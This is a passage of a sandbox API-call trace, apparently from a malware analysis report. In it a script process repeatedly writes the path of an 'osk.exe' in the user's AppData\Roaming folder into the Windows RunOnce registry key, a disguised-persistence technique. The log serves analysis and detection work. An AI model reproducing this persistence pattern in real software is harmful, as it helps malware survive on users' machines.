cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.537] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x41 [0079.537] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.537] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.537] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0079.537] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.537] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.537] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.537] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.537] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.538] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.538] RegCloseKey (hKey=0x280) returned 0x0 [0079.538] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.538] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.538] SetTimer (hWnd=0x20280, nIDEvent=0x2041, uElapse=0xa, lpTimerFunc=0x0) returned 0x2041 [0079.538] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.558] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.558] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.558] KillTimer (hWnd=0x20280, uIDEvent=0x2041) returned 1 [0079.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.558] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.559] IUnknown:Release (This=0x787518) returned 0x1 [0079.559] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.559] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.559] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.559] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.559] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x42 [0079.559] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.559] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x43 [0079.559] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.560] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x42 [0079.560] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.560] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.560] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.560] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0079.560] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.561] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.561] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.561] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.561] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.561] RegCloseKey (hKey=0x280) returned 0x0 [0079.561] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.561] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.561] SetTimer (hWnd=0x20280, nIDEvent=0x2042, uElapse=0xa, lpTimerFunc=0x0) returned 0x2042 [0079.561] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.565] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.565] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.566] KillTimer (hWnd=0x20280, uIDEvent=0x2042) returned 1 [0079.566] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.566] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.566] IUnknown:Release (This=0x787518) returned 0x1 [0079.566] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.566] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.566] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.566] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.567] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x43 [0079.567] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.567] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x44 [0079.567] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.567] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x43 [0079.567] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.567] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.567] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.568] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.568] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.568] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.568] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.568] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.568] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.568] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0079.568] RegCloseKey (hKey=0x280) returned 0x0 [0079.568] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.568] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.568] SetTimer (hWnd=0x20280, nIDEvent=0x2043, uElapse=0xa, lpTimerFunc=0x0) returned 0x2043 [0079.568] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.582] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.582] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.582] KillTimer (hWnd=0x20280, uIDEvent=0x2043) returned 1 [0079.582] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.582] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.583] IUnknown:Release (This=0x787518) returned 0x1 [0079.583] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.583] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.583] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.583] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.583] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x44 
